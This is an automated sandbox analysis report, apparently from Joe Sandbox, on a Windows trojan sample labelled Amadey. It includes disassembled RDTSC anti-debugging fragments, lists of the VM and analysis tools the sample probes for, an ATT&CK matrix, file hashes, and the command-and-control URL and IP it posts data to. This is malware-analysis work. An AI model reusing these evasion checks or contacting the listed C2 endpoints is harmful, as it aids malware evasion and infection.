Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713131A second address: 713131E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713131E second address: 713132E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713132E second address: 71313FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c jmp 00007FC19D472F36h 0x00000011 mov dword ptr [edx+28h], eax 0x00000014 jmp 00007FC19D472F30h 0x00000019 mov ecx, dword ptr [esi+2Ch] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FC19D472F2Eh 0x00000023 jmp 00007FC19D472F35h 0x00000028 popfd 0x00000029 pushad 0x0000002a mov esi, 7498955Dh 0x0000002f movzx ecx, bx 0x00000032 popad 0x00000033 popad 0x00000034 mov dword ptr [edx+2Ch], ecx 0x00000037 pushad 0x00000038 mov bh, 0Ah 0x0000003a pushfd 0x0000003b jmp 00007FC19D472F2Ch 0x00000040 sbb cx, 58E8h 0x00000045 jmp 00007FC19D472F2Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov ax, word ptr [esi+30h] 0x00000050 pushad 0x00000051 mov esi, 36C433FBh 0x00000056 jmp 00007FC19D472F30h 0x0000005b popad 0x0000005c mov word ptr [edx+30h], ax 0x00000060 jmp 00007FC19D472F30h 0x00000065 mov ax, word ptr [esi+32h] 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71313FB second address: 71313FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71313FF second address: 713141C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713141C second address: 713145A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e movzx ecx, dx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+34h] 0x00000019 jmp 00007FC19CEC1DD1h 0x0000001e mov dword ptr [edx+34h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713145A second address: 713145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713145E second address: 71314A4 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FC19CEC1DD4h 0x0000000c popad 0x0000000d test ecx, 00000700h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC19CEC1DCEh 0x0000001a xor esi, 6F42BFF8h 0x00000020 jmp 00007FC19CEC1DCBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71314A4 second address: 71314C9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4A423C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007FC20D17118Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC19D472F33h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71314C9 second address: 71314FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d pushad 0x0000000e movzx eax, di 0x00000011 mov si, di 0x00000014 popad 0x00000015 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, ecx 0x0000001e mov dh, ch 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71314FE second address: 7131513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19D472F31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131513 second address: 7131537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+40h], FFFFFFFFh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx edi, cx 0x00000015 push ecx 0x00000016 pop edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131537 second address: 713158E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19D472F37h 0x00000009 and eax, 47ECB5EEh 0x0000000f jmp 00007FC19D472F39h 0x00000014 popfd 0x00000015 mov ch, F5h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop esi 0x0000001b pushad 0x0000001c mov ebx, 3EBA1D7Ch 0x00000021 mov ecx, edi 0x00000023 popad 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC19D472F2Ah 0x0000002c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0048 second address: 70C004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C004D second address: 70C00B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 movzx ecx, di 0x0000000c movsx edx, cx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FC19D472F34h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov dl, ch 0x0000001b pushfd 0x0000001c jmp 00007FC19D472F33h 0x00000021 jmp 00007FC19D472F33h 0x00000026 popfd 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC19D472F35h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0653 second address: 70C0657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0657 second address: 70C0686 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC19D472F2Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov cx, dx 0x0000000d popad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC19D472F39h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0686 second address: 70C06C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FC19CEC1DCEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC19CEC1DD7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06C7 second address: 70C06DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19D472F34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06DF second address: 70C06EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06EE second address: 70C06F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06F2 second address: 70C06F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C06F6 second address: 70C06FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A52 second address: 70C0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A56 second address: 70C0A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A5C second address: 70C0A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19CEC1DCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A6D second address: 70C0A94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC19D472F2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0A94 second address: 70C0AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19CEC1DCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 70C0AA4 second address: 70C0B00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushfd 0x0000000c jmp 00007FC19D472F33h 0x00000011 sub esi, 241F06BEh 0x00000017 jmp 00007FC19D472F39h 0x0000001c popfd 0x0000001d pop esi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FC19D472F2Ah 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC19D472F2Ah 0x00000030 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Special instruction interceptor: First address: ABD9FC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Special instruction interceptor: First address: ABB182 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Special instruction interceptor: First address: CE25AC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe TID: 7068 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe TID: 7044 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe TID: 7040 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe File Volume queried: C:\ FullSizeInformation
Source: fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000002.2840088094.0000000000C35000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: fnuFOEqg4j.exe Binary or memory string: Hyper-V RAW
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: fnuFOEqg4j.exe, 00000000.00000003.2417036277.0000000006991000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#}}
Source: fnuFOEqg4j.exe, 00000000.00000002.2840088094.0000000000C35000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: fnuFOEqg4j.exe, 00000000.00000003.2838831418.00000000016C3000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2839282706.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2750348984.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838552813.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2842014481.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838456196.00000000016B1000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838779723.00000000016BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe File opened: NTICE
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe File opened: SICE
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe File opened: SIWVID
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Process queried: DebugPort
Source: fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000002.2840088094.0000000000C35000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: mProgram Manager
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\fnuFOEqg4j.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.12:49711 -> 147.45.113.159:80
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 741 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 12 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 214 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact

Source | Detection | Scanner | Label
fnuFOEqg4j.exe | 66% | ReversingLabs | Win32.Trojan.Amadey
fnuFOEqg4j.exe | 100% | Avira | TR/Crypt.TPM.Gen
fnuFOEqg4j.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.twentytk20pn.top | 147.45.113.159 | true | false |  | high
httpbin.org | 98.85.100.80 | true | false |  | high

Name | Malicious | Antivirus Detection | Reputation
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | false |  | high
https://httpbin.org/ip | false |  | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
http://html4/loose.dtd | fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
https://httpbin.org/ipbefore | fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
https://curl.se/docs/http-cookies.html | fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument= | fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000003.2838493021.0000000001662000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2841593023.0000000001664000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838749363.0000000001664000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
https://curl.se/docs/alt-svc.html | fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322 | fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
http://.css | fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322::3 | fnuFOEqg4j.exe, 00000000.00000002.2841276456.000000000162E000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://.jpg | fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF | fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmp | false |  | high
IP | Domain | Country | ASN | ASN Name | Malicious
98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false
147.45.113.159 | home.twentytk20pn.top | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578959
Start date and time: 2024-12-20 17:05:44 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fnuFOEqg4j.exe (renamed because original name is a hash value)
Original Sample Name: 61039d97d478405525707e3c0b4b3003.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 51%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target fnuFOEqg4j.exe, PID 6988 because there are no executed function
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: fnuFOEqg4j.exe

Time | Type | Description
11:07:15 | API Interceptor | 97x Sleep call for process: fnuFOEqg4j.exe modified
No created / dropped files found

File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.9860824286013745
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: fnuFOEqg4j.exe
File size: 4'421'632 bytes
MD5: 61039d97d478405525707e3c0b4b3003
SHA1: 501cf467cd61ca88a1e0991c2d7899a97237d8ff
SHA256: be39f15bfaeb90c138dbbc06f647ba537c5b451459343b9ef2a5583c0a02a89c
SHA512: d08d9262de6777f0b9f7d010462ec669d3f58cc202c528ca8caac9c9611a50629ee3c311abc3689fa7ce2e52eb1dacc17b3e9f0aac61ffa6f924e903879d74ee
SSDEEP: 98304:rJjB8hwcXiocct8XrfDDUR8o7iPiyg9GrLi+3OgQp8odxsw53Er:t+WE8Xr0Rt7crg9Gu+3OgQQw
TLSH: A82633909D888E00FB28547EE1CD2C8A3E756D362C356D01FA867A7D259F6BB2017D3C
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@..................................PD...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0xf49000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61905f | 0x73 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x618000 | 0x2b0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb47ac4 | 0x10 | jjnhjgow |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xb47a74 | 0x18 | jjnhjgow |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
